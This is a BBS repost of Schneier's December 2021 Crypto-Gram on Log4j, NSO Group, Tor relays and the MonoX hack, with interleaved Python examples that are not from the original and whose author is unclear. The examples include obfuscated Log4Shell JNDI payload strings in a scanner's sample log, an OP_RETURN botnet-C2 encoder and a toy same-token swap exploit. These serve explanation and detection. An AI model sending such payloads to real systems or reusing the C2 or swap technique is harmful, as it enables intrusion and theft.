AT2k Design BBS Message Area -- Computer Support/Help/Discussion

From: Sean Rima
To: All
Subject: CRYPTO-GRAM, December 15, 2021
Date: December 15, 2021, 6:42 PM

Crypto-Gram 
December 15, 2021

by Bruce Schneier 
Fellow and Lecturer, Harvard Kennedy School  schneier@schneier.com 
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and 
commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram's web page.

Read this issue on the web

These same essays and news items appear in the Schneier on Security blog, along
with a lively and intelligent comment section. An RSS feed is available.

** *** ***** ******* *********** *************

In this issue:

If these links don't work in your email client, try reading this issue of
Crypto-Gram on the web.

Securing Your Smartphone
Why I Hate Password Rules
Wire Fraud Scam Upgraded with Bitcoin
Is Microsoft Stealing People's Bookmarks?
New Rowhammer Technique
"Crypto" Means "Cryptography," Not "Cryptocurrency"
Apple Sues NSO Group
Proposed UK Law Bans Default Passwords
Intel Is Maintaining Legacy Technology for Security Research
Smart Contract Bug Results in $31 Million Loss
Testing Faraday Cages
Thieves Using AirTags to "Follow" Cars
Someone Is Running Lots of Tor Relays
New German Government is Pro-Encryption and Anti-Backdoors
Google Shuts Down Glupteba Botnet, Sues Operators
Law Enforcement Access to Chat Data and Metadata
NSO Group's Pegasus Spyware Used Against US State Department Officials
On the Log4j Vulnerability
Upcoming Speaking Engagements
** *** ***** ******* *********** *************

Securing Your Smartphone

[2021.11.15] This is part 3 of Sean Gallagher's advice for "securing your
digital life."

** *** ***** ******* *********** *************

Why I Hate Password Rules

[2021.11.16] The other day, I was creating a new account on the web. It was
financial in nature, which means it gets one of my most secure passwords. I used
Password Safe to generate this 16-character alphanumeric password:

:s^Twd.J;3hzg=Q~

Which was rejected by the site, because it didn't meet its password security
rules.

It took me a minute to figure out what was wrong with it. The site wanted at
least two numbers.

Sheesh.

Okay, that's not really why I don't like password rules. I don't like them
because they're all different. Even if someone has a strong password generation
system, it is likely that whatever they come up with won't pass somebody's
ruleset.
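
To see what such a rule actually buys, here is an added worked example in
Python; it is mine, not from the newsletter or from Password Safe. It checks a
password against a hypothetical ruleset of the kind the site imposed (the text
only reveals "at least two numbers"; the other rules are assumptions), computes
how much entropy the digit rule removes from a uniformly random 16-character
password drawn from the 94 printable ASCII symbols, and generates a compliant
password by rejection sampling, which keeps the result uniformly distributed
over the compliant strings:

```python
import math
import secrets
import string

# The 94 printable ASCII symbols a generator like Password Safe draws from.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

# Hypothetical site ruleset (assumption: only "at least two numbers" is known
# from the text; the remaining rules are typical but invented here).
RULES = {
    "at least two digits": lambda p: sum(c.isdigit() for c in p) >= 2,
    "at least one upper-case letter": lambda p: any(c.isupper() for c in p),
    "at least one lower-case letter": lambda p: any(c.islower() for c in p),
    "at least one symbol": lambda p: any(c in string.punctuation for c in p),
    "between 12 and 32 characters": lambda p: 12 <= len(p) <= 32,
}


def failed_rules(password: str) -> list:
    """Names of the rules the password does not satisfy (empty list == accepted)."""
    return [name for name, ok in RULES.items() if not ok(password)]


def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of a uniformly random password of `length` symbols."""
    return length * math.log2(alphabet_size)


def min_digits_cost_bits(length: int, k: int,
                         alphabet_size: int = len(ALPHABET), digits: int = 10) -> float:
    """Entropy, in bits, that an 'at least k digits' rule removes from a uniformly
    random password: -log2 P(at least k of the symbols are digits). The digit
    count of a uniform random string is binomially distributed."""
    p = digits / alphabet_size
    p_ok = sum(math.comb(length, i) * p ** i * (1 - p) ** (length - i)
               for i in range(k, length + 1))
    return -math.log2(p_ok)


def generate(length: int = 16, max_tries: int = 10_000) -> str:
    """Random password that satisfies RULES, by rejection sampling: draw
    uniformly, check, redraw. Unlike 'insert a digit at position 0' fix-ups,
    this keeps the output uniform over the set of compliant strings."""
    for _ in range(max_tries):
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if not failed_rules(candidate):
            return candidate
    raise RuntimeError("ruleset too restrictive for this length")


if __name__ == "__main__":
    rejected = ":s^Twd.J;3hzg=Q~"          # the password quoted above
    print(failed_rules(rejected))           # the rule(s) it fails
    print(f"{entropy_bits(16):.1f} bits for 16 uniformly random symbols")
    print(f"{min_digits_cost_bits(16, 2):.2f} bits lost to 'at least two digits'")
    print(generate())
```

On the numbers: 16 symbols from a 94-character alphabet carry about 104.9
bits, and demanding two digits costs only about 0.94 bits, because roughly half
of all random 16-character strings already satisfy it. For someone using a
generator the rule adds nothing and only rejects good passwords; it is aimed at
people who pick words.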

** *** ***** ******* *********** *************

Wire Fraud Scam Upgraded with Bitcoin

[2021.11.16] The FBI has issued a bulletin describing a bitcoin variant of a
wire fraud scam:

As the agency describes it, the scammer will contact their victim and somehow
convince them that they need to send money, either with promises of love,
further riches, or by impersonating an actual institution like a bank or
utility company. After the mark is convinced, the scammer will have them get
cash (sometimes out of investment or retirement accounts), and head to an ATM
that sells cryptocurrencies and supports reading QR codes. Once the victim's
there, they'll scan a QR code that the scammer sent them, which will tell the
machine to send any crypto purchased to the scammer's address. Just like that,
the victim loses their money, and the scammer has successfully exploited them.

[...]

The "upgrade" (as it were) for scammers with the crypto ATM method is two-fold:
it can be less friction than sending a wire transfer, and at the end the
scammer has cryptocurrency instead of fiat. With wire transfers, you have to
fill out a form, and you may give that form to an actual person (who could
potentially vibe check you). Using the ATM method, there's less time to reflect
on the fact that you're about to send money to a stranger. And, if you're a
criminal trying to get your hands on Bitcoin, you won't have to teach your
targets how to buy coins on the internet and transfer them to another wallet --
they probably already know how to use an ATM and scan a QR code.

** *** ***** ******* *********** *************

Is Microsoft Stealing People's Bookmarks?

[2021.11.17] I received email from two people who told me that Microsoft Edge
enabled synching without warning or consent, which means that Microsoft sucked
up all of their bookmarks. Of course they can turn synching off, but it's too
late.

Has this happened to anyone else, or was this user error of some sort? If this
is real, can some reporter write about it?

(Not that "user error" is a good justification. Any system where making a
simple mistake means that you've forever lost your privacy isn't a good one. We
see this same situation with sharing contact lists with apps on smartphones.
Apps will repeatedly ask, and only need you to accidentally click "okay" once.)

EDITED TO ADD: It's actually worse than I thought. Edge urges users to store
passwords, ID numbers, and even passport numbers, all of which get uploaded to
Microsoft by default when synch is enabled.

** *** ***** ******* *********** *************

New Rowhammer Technique

[2021.11.19] Rowhammer is an attack technique involving accessing -- that's
"hammering" -- rows of bits in memory, millions of times per second, with the
intent of causing bits in neighboring rows to flip. This is a fault-injection
attack on the DRAM hardware itself (not a side channel: it corrupts data rather
than leaking it), and the result can be all sorts of mayhem.

Well, there is a new enhancement:

All previous Rowhammer attacks have hammered rows with uniform patterns, such as
single-sided, double-sided, or n-sided. In all three cases, these "aggressor"
rows -- meaning those that cause bitflips in nearby "victim" rows -- are
accessed the same number of times.

Research published on Monday presented a new Rowhammer technique. It uses
non-uniform patterns that access two or more aggressor rows with different
frequencies. The result: all 40 of the randomly selected DIMMs in a test pool
experienced bitflips, up from 13 out of 42 chips tested in previous work from
the same researchers.

[...]

The non-uniform patterns work against Target Row Refresh. Abbreviated as TRR,
the mitigation works differently from vendor to vendor but generally tracks the
number of times a row is accessed and recharges neighboring victim rows when
there are signs of abuse. The neutering of this defense puts further pressure
on chipmakers to mitigate a class of attacks that many people thought more
recent types of memory chips were resistant to.

** *** ***** ******* *********** *************

"Crypto" Means "Cryptography," Not "Cryptocurrency"

[2021.11.22] I have long been annoyed that the word "crypto" has been co-opted
by the blockchain people, and no longer refers to "cryptography." I'm not the
only one.

** *** ***** ******* *********** *************

Apple Sues NSO Group

[2021.11.24] Piling more on NSO Group's legal troubles, Apple is suing it:

The complaint provides new information on how NSO Group infected victims'
devices with its Pegasus spyware. To prevent further abuse and harm to its
users, Apple is also seeking a permanent injunction to ban NSO Group from using
any Apple software, services, or devices.

NSO Group's Pegasus spyware is favored by totalitarian governments around the
world, who use it to hack Apple phones and computers.

More news:

Apple's legal complaint provides new information on NSO Group's FORCEDENTRY, an
exploit for a now-patched vulnerability previously used to break into a
victim's Apple device and install the latest version of NSO Group's spyware
product, Pegasus. The exploit was originally identified by the Citizen Lab, a
research group at the University of Toronto.

The spyware was used to attack a small number of Apple users worldwide with
dangerous malware and spyware. Apple's lawsuit seeks to ban NSO Group from
further harming individuals by using Apple's products and services. The lawsuit
also seeks redress for NSO Group's flagrant violations of US federal and state
law, arising out of its efforts to target and attack Apple and its users.

NSO Group and its clients devote the immense resources and capabilities of
nation-states to conduct highly targeted cyberattacks, allowing them to access
the microphone, camera, and other sensitive data on Apple and Android devices.
To deliver FORCEDENTRY to Apple devices, attackers created Apple IDs to send
malicious data to a victim's device -- allowing NSO Group or its clients to
deliver and install Pegasus spyware without a victim's knowledge. Though misused
to deliver FORCEDENTRY, Apple servers were not hacked or compromised in the
attacks.

This follows in the footsteps of Facebook, which is also suing NSO Group and
demanding a similar prohibition. And while the idea of the intermediary suing
the attacker, and not the victim, is somewhat novel, I think it makes a lot of
sense. I have a law journal article about to be published with Jon Penney on
the Facebook case.

EDITED TO ADD (12/14): Supplemental brief.

** *** ***** ******* *********** *************

Proposed UK Law Bans Default Passwords

[2021.11.26] Following California�s lead, a new UK law would ban default 
passwords in IoT devices.

EDITED TO ADD (12/12): Commentary.

EDITED TO ADD (12/14): A draft of the bill.

** *** ***** ******* *********** *************

Intel Is Maintaining Legacy Technology for Security Research

[2021.11.30] Interesting:

Intel's issue reflects a wider concern: Legacy technology can introduce
cybersecurity weaknesses. Tech makers constantly improve their products to take
advantage of speed and power increases, but customers don't always upgrade at
the same pace. This creates a long tail of old products that remain in
widespread use, vulnerable to attacks.

Intel's answer to this conundrum was to create a warehouse and laboratory in
Costa Rica, where the company already had a research-and-development lab, to
store the breadth of its technology and make the devices available for remote
testing. After planning began in mid-2018, the Long-Term Retention Lab was up
and running in the second half of 2019.

The warehouse stores around 3,000 pieces of hardware and software, going back
about a decade. Intel plans to expand next year, nearly doubling the space to
27,000 square feet from 14,000, allowing the facility to house 6,000 pieces of
computer equipment.

Intel engineers can request a specific machine in a configuration of their
choice. It is then assembled by a technician and accessible through cloud
services. The lab runs 24 hours a day, seven days a week, typically with about
25 engineers working any given shift.

Slashdot thread.

** *** ***** ******* *********** *************

Smart Contract Bug Results in $31 Million Loss

[2021.12.02] A hacker stole $31 million from the blockchain company MonoX
Finance, by exploiting a bug in software the service uses to draft smart
contracts.

Specifically, the hack used the same token as both the tokenIn and tokenOut,
which are methods for exchanging the value of one token for another. MonoX
updates prices after each swap by calculating new prices for both tokens. When
the swap is completed, the price of tokenIn -- that is, the token sent by the
user -- decreases and the price of tokenOut -- or the token received by the
user -- increases.

By using the same token for both tokenIn and tokenOut, the hacker greatly
inflated the price of the MONO token because the updating of the tokenOut
overwrote the price update of the tokenIn. The hacker then exchanged the token
for $31 million worth of tokens on the Ethereum and Polygon blockchains.

The article goes on to talk about how common these sorts of attacks are. The
basic problem is that the code is the ultimate authority -- there is no
adjudication protocol -- so if there's a vulnerability in the code, there is no
recourse. And, of course, there are lots of vulnerabilities in code.

To me, this is reason enough never to use smart contracts for anything
important. Human-based adjudication systems are not useless pre-Internet human
baggage, they're vital.
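
The double write is the whole bug, and a few lines make it visible. What
follows is an added illustration in Python, not MonoX's Solidity (whose pricing
formula is not reproduced here): a toy single-sided pool that keeps one stored
price per token and, as described above, lowers tokenIn's price and raises
tokenOut's price after every swap. The 10% price impact per swap and the
opening prices are constructed values. The vulnerable pool writes the two
updates back separately, so when tokenIn == tokenOut the second write wins and
the price only ever goes up; the hardened variant rejects the degenerate swap
before touching state:

```python
IMPACT = 0.10  # constructed: each swap moves a price by 10% (real AMMs derive this from depth)


class VulnerablePool:
    """Toy single-sided pool: one stored price per token, updated after each swap."""

    def __init__(self, prices: dict):
        self.prices = dict(prices)

    def swap(self, token_in: str, token_out: str, amount_in: float) -> float:
        p_in, p_out = self.prices[token_in], self.prices[token_out]
        amount_out = amount_in * p_in / p_out       # quote at the pre-swap prices
        # Two independent storage writes: tokenIn goes down, tokenOut goes up.
        # When token_in == token_out the second line silently overwrites the
        # first, so the net effect of the "swap" is a price increase.
        self.prices[token_in] = p_in * (1 - IMPACT)
        self.prices[token_out] = p_out * (1 + IMPACT)
        return amount_out


class HardenedPool(VulnerablePool):
    """Same pool with the precondition the vulnerable one lacks."""

    def swap(self, token_in: str, token_out: str, amount_in: float) -> float:
        if token_in == token_out:
            raise ValueError("tokenIn and tokenOut must differ")
        return super().swap(token_in, token_out, amount_in)


def inflate(pool: VulnerablePool, token: str, rounds: int, amount: float = 1.0) -> float:
    """Run `rounds` same-token swaps and return the token's resulting price."""
    for _ in range(rounds):
        pool.swap(token, token, amount)
    return pool.prices[token]


def rejects_same_token(pool: VulnerablePool) -> bool:
    """True if the pool refuses a swap whose two legs are the same token."""
    try:
        pool.swap("MONO", "MONO", 1.0)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    v = VulnerablePool({"MONO": 1.0, "USDC": 1.0})
    print(f"MONO after 10 self-swaps: {inflate(v, 'MONO', 10):.4f}")    # 1.1**10, about 2.59
    print(f"USDC received for 1 MONO: {v.swap('MONO', 'USDC', 1.0):.4f}")
    print("hardened pool rejects it:", rejects_same_token(HardenedPool({"MONO": 1.0, "USDC": 1.0})))
```

Every self-swap compounds the inflation, and no real value enters the pool at
any point. In a contract the obvious guard is the same precondition at the top
of the swap function (require that the two tokens differ), together with
reading each price once and writing each storage slot once, so that no update
can silently overwrite another.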

** *** ***** ******* *********** *************

Testing Faraday Cages

[2021.12.03] Matt Blaze tested a variety of Faraday cages for phones, both
commercial and homemade.

The bottom line:

A quick and likely reliable "go/no go test" can be done with an Apple AirTag
and an iPhone: drop the AirTag in the bag under test, and see if the phone can
locate it and activate its alarm (beware of caching in the FindMy app when
doing this).

This test won't tell you the exact attenuation level, of course, but it will
tell you if the attenuation is sufficient for most practical purposes. It can
also detect whether an otherwise good bag has been damaged and compromised.

At least in the frequency ranges I tested, two commercial Faraday pouches (the
EDEC OffGrid and Mission Darkness Window pouches) yielded excellent performance
sufficient to provide assurance of signal isolation under most real-world
circumstances. None of the makeshift solutions consistently did nearly as well,
although aluminum foil can, under ideal circumstances (that are difficult to
replicate) sometimes provide comparable levels of attenuation.

** *** ***** ******* *********** *************

Thieves Using AirTags to "Follow" Cars

[2021.12.06] From Ontario and not surprising:

Since September 2021, officers have investigated five incidents where suspects
have placed small tracking devices on high-end vehicles so they can later
locate and steal them. Brand name "air tags" are placed in out-of-sight areas
of the target vehicles when they are parked in public places like malls or
parking lots. Thieves then track the targeted vehicles to the victim's
residence, where they are stolen from the driveway.

Thieves typically use tools like screwdrivers to enter the vehicles through the
driver or passenger door, while ensuring not to set off alarms. Once inside, an
electronic device, typically used by mechanics to reprogram the factory
setting, is connected to the onboard diagnostics port below the dashboard and
programs the vehicle to accept a key the thieves have brought with them. Once
the new key is programmed, the vehicle will start and the thieves drive it
away.

I'm not sure if there's anything that can be done:

When Apple first released AirTags earlier this year, concerns immediately
sprung up about nefarious use cases for the covert trackers. Apple responded
with a slew of anti-stalking measures, but those are more intended for keeping
people safe than cars. An AirTag away from its owner will sound an alarm,
letting anyone nearby know that it's been left behind, but it can take up to 24
hours for that alarm to go off -- more than enough time to nab a car in the
dead of night.

** *** ***** ******* *********** *************

Someone Is Running Lots of Tor Relays

[2021.12.07] Since 2017, someone is running about a thousand -- 10% of the
total -- Tor servers in an attempt to deanonymize the network:

Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor
has constantly added servers with no contact details to the Tor network in
industrial quantities, operating servers in the realm of hundreds at any given
point.

The actor's servers are typically located in data centers spread all over the
world and are typically configured as entry and middle points primarily,
although KAX17 also operates a small number of exit points.

Nusenu said this is strange as most threat actors operating malicious Tor
relays tend to focus on running exit points, which allows them to modify the
user's traffic. For example, a threat actor that Nusenu has been tracking as
BTCMITM20 ran thousands of malicious Tor exit nodes in order to replace Bitcoin
wallet addresses inside web traffic and hijack user payments.

KAX17's focus on Tor entry and middle relays led Nusenu to believe that the
group, which he described as "non-amateur level and persistent," is trying to
collect information on users connecting to the Tor network and attempting to
map their routes inside it.

In research published this week and shared with The Record, Nusenu said that
at one point, there was a 16% chance that a Tor user would connect to the Tor
network through one of KAX17's servers, a 35% chance they would pass through
one of its middle relays, and up to 5% chance to exit through one.

Slashdot thread.
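
Those percentages come from summing the position-weighted selection
probabilities of the relays attributed to one operator, a check anyone can run
against the Tor network's public relay data. The following is an added example
in Python, mine rather than Nusenu's tooling. It works on records in the shape
of the Tor Project's Onionoo "details" documents (https://onionoo.torproject.org/details),
whose relay objects carry `contact`, `flags` and `guard_probability` /
`middle_probability` / `exit_probability` fields; the four relays below are
constructed, with numbers chosen to reproduce the 16% / 35% / 5% figures quoted
above. It groups relays that publish no contact line, reports the share of each
circuit position they hold, and computes the chance that a circuit has that
group at both ends, which is the position that allows traffic correlation:

```python
from typing import Callable, Dict, Iterable, List

# Constructed relay records in the shape of Onionoo "details" objects;
# nicknames, contacts and probabilities are made up for this example.
SAMPLE_RELAYS: List[Dict] = [
    {"nickname": "relayA", "contact": "ops@example.org",
     "flags": ["Guard", "Running", "Stable"],
     "guard_probability": 0.05, "middle_probability": 0.02, "exit_probability": 0.00},
    {"nickname": "relayB", "contact": "",
     "flags": ["Guard", "Running"],
     "guard_probability": 0.10, "middle_probability": 0.20, "exit_probability": 0.00},
    {"nickname": "relayC",                      # no "contact" key at all
     "flags": ["Guard", "Exit", "Running"],
     "guard_probability": 0.06, "middle_probability": 0.15, "exit_probability": 0.05},
    {"nickname": "relayD", "contact": "someone@example.net",
     "flags": ["Exit", "Running"],
     "guard_probability": 0.00, "middle_probability": 0.03, "exit_probability": 0.10},
]

POSITIONS = ("guard", "middle", "exit")


def has_contact(relay: Dict) -> bool:
    """Onionoo omits `contact` entirely when the relay publishes none;
    an empty or whitespace-only string counts as none too."""
    return bool(relay.get("contact", "").strip())


def position_share(relays: Iterable[Dict],
                   keep: Callable[[Dict], bool]) -> Dict[str, float]:
    """Sum the per-position selection probabilities of the relays `keep`
    selects: the chance a client picks one of them for that hop."""
    share = {pos: 0.0 for pos in POSITIONS}
    for relay in relays:
        if keep(relay):
            for pos in POSITIONS:
                share[pos] += relay.get(f"{pos}_probability", 0.0)
    return share


def both_ends_probability(share: Dict[str, float]) -> float:
    """Chance a circuit has the group at guard AND exit, treating the two
    picks as independent. Approximation: real clients pin a guard for months,
    so this is closer to a per-client than a per-circuit figure."""
    return share["guard"] * share["exit"]


def no_contact_report(relays: Iterable[Dict]) -> Dict[str, float]:
    """Position shares held by relays with no contact information."""
    relays = list(relays)
    report = position_share(relays, lambda r: not has_contact(r))
    report["both_ends"] = both_ends_probability(report)
    report["relay_count"] = sum(1 for r in relays if not has_contact(r))
    return report


if __name__ == "__main__":
    for key, value in no_contact_report(SAMPLE_RELAYS).items():
        print(f"{key:12s} {value:.3f}")
```

Against live data, replace SAMPLE_RELAYS with the `relays` array of a saved
Onionoo details document. Missing contact information on its own proves
nothing, but one contact-less group whose shares approach the numbers quoted
above is exactly the pattern Nusenu's analysis flagged.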

** *** ***** ******* *********** *************

New German Government is Pro-Encryption and Anti-Backdoors

[2021.12.08] I hope this is true:

According to Jens Zimmermann, the German coalition negotiations had made it
"quite clear" that the incoming government of the Social Democrats (SPD), the
Greens and the business-friendly liberal FDP would reject "the weakening of
encryption, which is being attempted under the guise of the fight against child
abuse" by the coalition partners.

Such regulations, which are already enshrined in the interim solution of the
ePrivacy Regulation, for example, "diametrically contradict the character of
the coalition agreement" because secure end-to-end encryption is guaranteed
there, Zimmermann said.

Introducing backdoors would undermine this goal of the coalition agreement, he
added.

I have written about this.

** *** ***** ******* *********** *************

Google Shuts Down Glupteba Botnet, Sues Operators

[2021.12.09] Google took steps to shut down the Glupteba botnet, at least for
now. (The botnet uses the bitcoin blockchain as a backup command-and-control
mechanism, making it hard to get rid of it permanently.) So Google is also
suing the botnet's operators.

It's an interesting strategy. Let's see if it's successful.
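
The blockchain-as-C2 trick works because a Bitcoin transaction may carry a
small, unspendable data output (a script beginning with OP_RETURN), and nothing
written to the chain can be taken down. A bot only has to watch transactions
from an address baked into its binary and read whatever the operator put there.
Here is an added example in Python, my own rather than Google's or the
malware's code, that builds such an output and parses it back. The
address-watching and the payload format of any real botnet are not reproduced,
and the payload is left in the clear purely for illustration:

```python
OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
OP_PUSHDATA2 = 0x4D


def build_op_return(payload: bytes) -> bytes:
    """scriptPubKey of a data-carrier output: OP_RETURN followed by one push."""
    n = len(payload)
    if n <= 75:
        push = bytes([n])                       # direct push: opcode is the length
    elif n <= 0xFF:
        push = bytes([OP_PUSHDATA1, n])
    elif n <= 0xFFFF:
        push = bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little")
    else:
        raise ValueError("payload too large for a single push")
    return bytes([OP_RETURN]) + push + payload


def parse_op_return(script: bytes):
    """Return the concatenated data pushed after OP_RETURN, or None if `script`
    is not a well-formed data-carrier script (wrong leading opcode, a non-push
    opcode, or a push that runs past the end of the script)."""
    if not script or script[0] != OP_RETURN:
        return None
    i, chunks = 1, []
    while i < len(script):
        op = script[i]
        i += 1
        if 1 <= op <= 75:
            n = op
        elif op == OP_PUSHDATA1 and i + 1 <= len(script):
            n = script[i]
            i += 1
        elif op == OP_PUSHDATA2 and i + 2 <= len(script):
            n = int.from_bytes(script[i:i + 2], "little")
            i += 2
        else:
            return None
        if i + n > len(script):
            return None
        chunks.append(script[i:i + n])
        i += n
    return b"".join(chunks)


def c2_from_script(script_hex: str):
    """Decode a constructed hostname payload from a hex scriptPubKey, or None."""
    data = parse_op_return(bytes.fromhex(script_hex))
    if data is None:
        return None
    try:
        return data.decode("ascii")
    except UnicodeDecodeError:
        return None


# Constructed sample: an operator publishing a fallback C2 hostname. The name
# uses the reserved .invalid TLD, so it resolves to nothing.
SAMPLE_SCRIPT_HEX = build_op_return(b"c2.example.invalid").hex()


if __name__ == "__main__":
    print(SAMPLE_SCRIPT_HEX)                 # 6a12 followed by the ASCII payload
    print(c2_from_script(SAMPLE_SCRIPT_HEX))
```

The same parser serves the defender: the wallet addresses a sample watches can
be extracted from it, and every OP_RETURN those addresses ever publish can be
read by anyone, so the channel that makes the botnet resilient also makes its
fallback infrastructure observable.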

** *** ***** ******* *********** *************

Law Enforcement Access to Chat Data and Metadata

[2021.12.10] A January 2021 FBI document outlines what types of data and
metadata can be lawfully obtained by the FBI from messaging apps. Rolling Stone
broke the story and it's been written about elsewhere.

I don't see a lot of surprises in the document. Lots of apps leak all sorts of
metadata: iMessage and WhatsApp seem to be the worst. Signal protects the most
metadata. End-to-end encrypted message content can be available if the user
uploads it to an unencrypted backup server.

EDITED TO ADD (12/13): Here's a more legible copy of the text.

** *** ***** ******* *********** *************

NSO Group's Pegasus Spyware Used Against US State Department Officials

[2021.12.13] NSO Group's descent into Internet pariah status continues. Its
Pegasus spyware was used against nine US State Department employees. We don't
know which NSO Group customer trained the spyware on the US. But the company
does:

NSO Group said in a statement on Thursday that it did not have any indication
their tools were used but canceled access for the relevant customers and would
investigate based on the Reuters inquiry.

"If our investigation shall show these actions indeed happened with NSO's
tools, such customer will be terminated permanently and legal actions will take
place," said an NSO spokesperson, who added that NSO will also "cooperate with
any relevant government authority and present the full information we will
have."

** *** ***** ******* *********** *************

On the Log4j Vulnerability

[2021.12.14] It's serious:

The range of impacts is so broad because of the nature of the vulnerability
itself. Developers use logging frameworks to keep track of what happens in a
given application. To exploit Log4Shell, an attacker only needs to get the
system to log a strategically crafted string of code. From there they can load
arbitrary code on the targeted server and install malware or launch other
attacks. Notably, hackers can introduce the snippet in seemingly benign ways,
like by sending the string in an email or setting it as an account username.

Threat advisory from Cisco. Cloudflare found it in the wild before it was
disclosed. CISA is very concerned, saying that hundreds of millions of devices
are likely affected.
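
Because the trigger is just a string that has to reach a logger, the first
thing a defender can do is look for it in whatever is already being logged:
web access logs, authentication logs, mail headers. The scanner below is an
added example in Python, mine rather than anything from Cisco, Cloudflare or
CISA. Matching on the literal `${jndi:` misses the obfuscated forms attackers
switched to within days, so it first collapses the common Log4j lookup tricks
(`${lower:J}`, `${upper:n}`, `${::-d}`, `${env:UNSET:-i}`) innermost-first and
then searches the normalized line. The five access-log lines are constructed
(addresses from the RFC 5737 documentation range), and the resolver handles
only those lookups, not the full Log4j substitution grammar:

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} that contains no further braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: either still in ${...} form (unterminated)
# or wrapped by _resolve() in «...» so later passes leave it alone.
_JNDI = re.compile(r"(?:\$\{|«)\s*jndi:\s*(\w+)", re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Resolve one brace-free lookup the way the evasions rely on. Unknown
    lookups come back as bare text, so the outer loop always terminates."""
    low = expr.lower()
    if low.startswith("jndi:"):
        return "«" + expr + "»"            # keep it, but stop re-matching it
    if low.startswith("lower:"):
        return expr[6:].lower()
    if low.startswith("upper:"):
        return expr[6:].upper()
    if ":-" in expr:
        return expr.split(":-", 1)[1]      # ${undefined:-default} and ${::-x}: the default wins
    return expr


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly replace innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[str]:
    """The JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log lines (198.51.100.0/24 is reserved for documentation).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.99:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:${::-r}mi://198.51.100.99:1099/b}"',
    '198.51.100.10 - - [10/Dec/2021:03:14:12 +0000] "POST /api HTTP/1.1" 200 88 "-" "${${env:NOPE:-j}ndi:${env:NOPE:-l}${lower:DAP}://198.51.100.99/c}"',
    '198.51.100.11 - - [10/Dec/2021:03:14:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 10 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LOG):
        print(f"line {index}: jndi scheme={scheme}")
```

Anything this flags is an exploitation attempt whether or not the receiving
server was vulnerable; the scheme and host in the normalized string identify
the attacker's callback server, which is what to block at the egress and hunt
for in outbound connection logs.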

** *** ***** ******* *********** *************

Upcoming Speaking Engagements

[2021.12.14] This is a current list of where and when I am scheduled to speak:

I'm speaking at the RSA Conference 2022 in San Francisco on February 8, 2022.
I'm speaking at IT-S Now 2022 in Vienna on June 2, 2022.
I'm speaking at the 14th International Conference on Cyber Conflict, CyCon
2022, in Tallinn, Estonia on June 3, 2022.

The list is maintained on this page.

** *** ***** ******* *********** *************

Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries,
analyses, insights, and commentaries on security technology. To subscribe, or
to read back issues, see Crypto-Gram's web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and
friends who will find it valuable. Permission is also granted to reprint
CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a
security guru by the Economist. He is the author of over one dozen books --
including his latest, We Have Root -- as well as hundreds of articles, essays,
and academic papers. His newsletter and blog are read by over 250,000 people.
Schneier is a fellow at the Berkman Klein Center for Internet & Society at
Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School;
a board member of the Electronic Frontier Foundation, AccessNow, and the Tor
Project; and an Advisory Board Member of the Electronic Privacy Information
Center and VerifiedVoting.org. He is the Chief of Security Architecture at
Inrupt, Inc.

Copyright (C) 2021 by Bruce Schneier.

--- BBBS/Li6 v4.10 Toy-5
 * Origin: TCOB1 at tcob1.duckdns.org BinkP / Telnet (618:500/14)